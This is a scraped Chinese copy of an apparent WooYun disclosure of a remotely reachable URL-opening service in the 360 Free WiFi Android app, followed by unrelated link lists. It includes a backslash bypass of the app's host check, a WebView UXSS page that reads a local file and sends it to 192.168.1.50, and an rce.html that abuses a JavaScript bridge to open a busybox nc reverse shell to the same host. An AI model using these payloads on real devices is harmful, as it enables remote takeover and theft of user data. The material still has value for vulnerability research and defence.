360免费WIFI可远程控制用户行为(种马弹shell窃取信息)

图文/WooYun @瘦蛟舞

漏洞详情

360免费WIFI个貌似后门的功能,将会给用户带来如何隐患?

通过netstat发现360免费 wifi监听6842端口.那么这个端口是干啥了的,是否可以利用?

sushell@pisces:/ su
su
root@pisces:/ # busybox netstat -tunlp
busybox netstat -tunlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    tcp        0      0 :::6842                 :::*                    LISTEN      17222/com.qihoo.fre

首先逆向客户端来查看下这个端口的功能,通过关键字6842查找

追到父类,发现其是一个 nanohttp 轻量 android webserver

github 上有其源码,这里目测360只抽取了部分代码
[https://github.com/NanoHttpd/nanohttpd]
继续查看其是如何传参的

将请求中 u 中的 url 取出并且打开打开浏览器,但是在这之前有个对 host 的判断

到这里貌似就只能打开360旗下的域名,再利用就比较麻烦了.找一个360域下的 xss?或者绕过这个 host 判断?
经过测试发现利用反斜杠可以绕过这个限制
http://192.168.1.102:6842/?u=http://drops.wooyun.org\.360.cn

漏洞证明

接下来该如何进一步利用,居然是通过浏览器打开指定网页.首先想到的是:

  • - 钓鱼/木马 apk/广告
  • - webview rce
  • - webview UXSS

现在就做两个实验:

通过360免费 wifi 远程 打开指定网页结合 webview UXSS 窃取用户本地数据

test.html:

<button οnclick="iframe.src='http://notfound/'">Open http://notfound/</button><br><button οnclick="exploit1()">Get local file!</button><br><script>function exploit1() {window.open('\u0000javascript:document.body.innerHTML="<script src=http://192.168.1.50/test.js></scr"+"ipt><iframe src=file:/default.prop οnlοad=exploit2()  style=width:100%;height:1000px; name=test2></iframe>";','test');}</script><iframe src="http://www.example.com/" id="iframe" style="width:100%;height:1000px;" name="test"></iframe>

test.js:

ar flag = 0;function exploit2(){if(flag) {return}window.open('\u0000javascript:location.replace("http://192.168.1.50/?file="+escape(document.body.innerHTML))','test2');flag = 1;}

通过360免费 wifi 远程 打开指定网页结合 webview 远程代码执行,反弹 shell

rce.html:

<script type="text/javascript">// var obj_smsManager = searchBoxJavaBridge_.getClass().forName("android.telephony.SmsManager").getMethod("getDefault",null).invoke(null,null);//// obj_smsManager.sendTextMessage("10000",null,"hello_world!",null,null);//function execute(cmdArgs){//searchBoxJavaBridge_return searchBoxJavaBridge_.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);}try{// execute(["/system/bin/sh","-c","id > /sdcard/browser.txt"]);execute(["/system/bin/sh","-c","busybox nc 192.168.1.50 8088|/system/bin/sh|busybox nc 192.168.1.50 9999"]);alert("good job!");}catch(e){alert(e);}</script>

360免费WIFI可远程控制用户行为(种马弹shell窃取信息)相关推荐

  1. 360免费WiFi连接不上了

    安装了360免费WiFi后,XiaoMi手机连接是可以的.后来,好像是经过设置修改或360安全卫士的推荐设置修改后,手机就连接不上了,总是报告"获取IP中".或"用户密码 ...

  2. 360免费wifi v5.3.0.1025 免费版

    360免费wifi v5.3.0.1025 免费版 软件大小:9.1MB 软件语言:简体中文 软件类别:网络共享 软件授权:免费版 更新时间:2015-01-31 应用平台:/Win8/Win7/Wi ...

  3. 360免费wifi v5.3.0.1035 免费版

    360免费wifi v5.3.0.1035 免费版 软件大小:9.1MB 软件语言:简体中文 软件类别:网络共享 软件授权:免费版 更新时间:2015-03-04 应用平台:/Win8/Win7/Wi ...

  4. 联想拯救者wifi老是掉线_联想拯救者win10系统安装360免费wifi连接手机总是掉线?...

    WIN10真正关闭自动更新的方法:方法一:按下Windows徽标键+R键,打开运行窗口命令,在窗口命令中输入"gpedit.msc"打开组策略编辑器以后,依次点击计算机配置-管理模 ...

  5. 校园网开热点显示无Internet连接和360免费WiFi猎豹WiFi冲突解决办法

    校园网开不了热点或者用360免费WiFi发生冲突 问题:校园网 连接后有网络显示无Internet连接,也开不了热点 解决方法: 方法一:使用像360免费WiFi类的软件进行开热点,同时你需要开启校园 ...

  6. 360免费WiFi密码查看分享

    由于现在智能机的普遍使用,想要连上网而到处搜wifi的人也跟着庞大了起来,但是很多wifi都设置了密码,想要破也不简单.于是为了冒个存在感,360推出了一款能提供免费wifi的软件,它能使你连上已被分 ...

  7. 用手机连接电脑的360免费WiFi(电脑自带的无线网卡启动AP模式)

    用手机连接电脑的360免费WiFi(电脑自带的无线网卡启动AP模式) 用手机连接电脑的360免费WiFi(电脑自带的无线网卡启动AP模式),手机的ip是直接从校园网分配的一个外网ip,并且这个手机的外 ...

  8. 苹果安卓360免费WiFi实现网络共享

    苹果手机一台               有移动网络,借公共网络下载了一个WIFI万能钥匙. 安卓手机一台              没有移动网络,借公共网络下载了一个WIFI万能钥匙. 电脑PC端一 ...

  9. Kali Linux安装360免费wifi驱动。

    参考文章:http://www.freemindworld.com/blog/2013/131010_360_wifi_in_linux.shtml http://blog.163.com/think ...

最新文章

  1. DirectSound的应用
  2. Docker部署ELK 日志归集
  3. 程序员入职国企,1周上班5小时,晒出薪资感叹:腾讯当CEO也不去
  4. hibernate的映射关系配置及对会话工厂的初始化。以及struts2写实例查询
  5. PX4原生固件SPI驱动动编写与IMU传感器替换
  6. .Net Core with 微服务 - 使用 AgileDT 快速实现基于可靠消息的分布式事务
  7. axi时序图_深入 AXI4总线(E3)实战:制作一个 AXI 接口 IP
  8. 消息队列——发布订阅模式
  9. 数据库索引优化原理,索引的工作机制
  10. c ++递归算法数的计数_计数排序算法–在C / C ++中实现的想法
  11. 二十三 常量池作为同步对象可能造成困惑
  12. AutoCAD 经典
  13. row format delimited fields terminated by ','
  14. Python开发环境配置常见命令与错误处理
  15. spring基础概述
  16. MySQL数据库常见报错案例与错误代码说明
  17. 苹果x付款显示服务器异常,怎么解决App Store未完成付款或AppleID登录失败
  18. H5游戏作弊与防作弊——我如何拿到第一名的天猫精灵
  19. SSM项目--资产管理系统
  20. 访问终端工具类TerminalUtils

热门文章

  1. android 内部 存储空间不足,解决安卓手机内部存储不足的方法原来这么简单,瞬间多了好几个G...
  2. Map集合(超详细+源码讲解)
  3. iPhone 6s/6s Plus 或 9.25 上市 可惜这些高配置都是鬼扯
  4. SKIN++皮肤的使用
  5. win11设置ToDesk待机状态
  6. 苹果征战PC市场胜算难定(转)
  7. http400错误可能是由于nginx导致的
  8. Python字典(附练习题)
  9. SSH实现删除功能的一些问题
  10. QT-FFMPEG录制屏幕和声音的完整程序(包含音视频同步)